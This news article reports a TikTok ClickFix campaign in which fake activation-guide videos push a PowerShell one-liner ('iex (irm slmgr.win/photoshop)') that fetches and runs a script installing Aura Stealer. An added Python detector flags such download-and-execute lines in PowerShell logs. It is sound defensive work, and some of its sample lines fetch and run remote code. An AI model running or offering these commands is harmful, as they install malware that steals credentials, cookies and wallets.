BREAKINGON

Beware: TikTok Videos Spreading Malware Masquerade as Free Software Activation Guides

10/21/2025
Cybercriminals are exploiting TikTok by masquerading as free activation guides for popular software, spreading information-stealing malware. Users are urged to stay vigilant and secure their accounts.

Beware of Cybercriminals Targeting TikTok Users with Malware

In a disturbing trend, cybercriminals are leveraging popular platforms like TikTok to spread information-stealing malware through videos disguised as free activation guides for well-known software. This ongoing campaign was recently identified by ISC Handler Xavier Mertens and mirrors tactics previously observed in May by security firm Trend Micro.

How the Scam Works

The TikTok videos, reported by BleepingComputer, masquerade as instructional content aimed at helping users activate legitimate products such as Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro. They also advertise fictitious activation guides for subscription services like Netflix and Spotify Premium. The videos rely on a technique known as a ClickFix attack, a form of social engineering designed to trick users into executing harmful PowerShell commands or scripts themselves.

The Execution of Malicious Commands

Each video presents a brief command and instructs viewers to execute it with administrative privileges in PowerShell. An example command is: iex (irm slmgr.win/photoshop). Notably, the program name in the URL varies according to the software being impersonated. For instance, in videos claiming to activate Windows, the URL would replace "photoshop" with "windows."

When users run these commands, PowerShell connects to the remote site slmgr.win to retrieve and execute another PowerShell script. That script is responsible for downloading two executables hosted on Cloudflare Pages. The first executable, available at https://file-epq.pages.dev/updater.exe, is identified as a variant of the Aura Stealer info-stealing malware.
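As an added example (not code from the article or from the researchers it cites), the following Python detector scans PowerShell script-block log entries (Event ID 4104) for the shape of the command quoted above: a download cmdlet chained into Invoke-Expression. It reports the host each flagged entry contacts. The sample log lines are constructed; slmgr.win is the host named in the article, and example.invalid is a placeholder.

```python
import re

# iex and irm/iwr are PowerShell aliases for Invoke-Expression and
# Invoke-RestMethod/Invoke-WebRequest. A ClickFix one-liner chains a
# fetch cmdlet into an execute cmdlet, so we require one of each.
EXEC_PATTERN = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
FETCH_PATTERN = re.compile(
    r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b",
    re.IGNORECASE,
)
# First URL-looking token after the fetch cmdlet. The scheme is optional
# because "irm slmgr.win/photoshop" lets PowerShell prepend http:// itself.
URL_PATTERN = re.compile(
    r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})(/[^\s)'\"]*)?", re.IGNORECASE
)

def classify_script_block(text: str):
    """Return (is_clickfix, host) for one script-block body."""
    fetch = FETCH_PATTERN.search(text)
    if not (fetch and EXEC_PATTERN.search(text)):
        return False, None
    url = URL_PATTERN.search(text, fetch.end())
    host = url.group(1).lower() if url else None
    return True, host

def scan_log(lines):
    """Return [(line_no, host)] for every entry matching the pattern."""
    hits = []
    for n, line in enumerate(lines, 1):
        flagged, host = classify_script_block(line)
        if flagged:
            hits.append((n, host))
    return hits

# Constructed sample 4104 bodies: the article's command, an assumed
# long-form variant, two benign entries, and a two-step fetch-then-run.
SAMPLE_LOG = [
    "iex (irm slmgr.win/photoshop)",
    "Invoke-Expression (Invoke-RestMethod -Uri 'https://example.invalid/windows')",
    "$r = irm https://api.github.com/repos/PowerShell/PowerShell/releases/latest",
    "Get-ChildItem C:\\Users | Format-Table",
    "iwr https://example.invalid/a.ps1 -OutFile a.ps1; iex (Get-Content a.ps1 -Raw)",
]

if __name__ == "__main__":
    for line_no, host in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: download-and-execute pattern, host={host}")
```

The third sample fetches a URL without executing it and is deliberately not flagged; tune the patterns before deploying against real logs, since legitimate admin scripts can also match.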

The Dangers of Aura Stealer

Aura Stealer is particularly dangerous as it collects sensitive information, including saved credentials from web browsers, authentication cookies, cryptocurrency wallet details, and other application credentials. Once gathered, this information is uploaded to the attackers, granting them unauthorized access to users' accounts.

Additional Payloads and User Precautions

Mertens also pointed out that an additional payload, named source.exe, is downloaded during this attack. This executable uses .NET's built-in Visual C# Compiler (csc.exe) to compile its own code at runtime, which is then injected and executed in memory. The exact purpose of this additional payload remains uncertain, which further underscores the risks associated with these attacks.

Users who have executed any of these commands should consider all their credentials compromised. It is crucial to immediately reset passwords on every platform they use. As ClickFix attacks gain traction, they are increasingly being used to distribute various malware strains, feeding ransomware and cryptocurrency theft campaigns.

Stay Informed and Safe

To protect yourself from such cyber threats, stay informed about the latest scams and always verify the legitimacy of any software activation guides you come across on social media platforms like TikTok. Awareness is your best defense against becoming a victim of cybercrime.
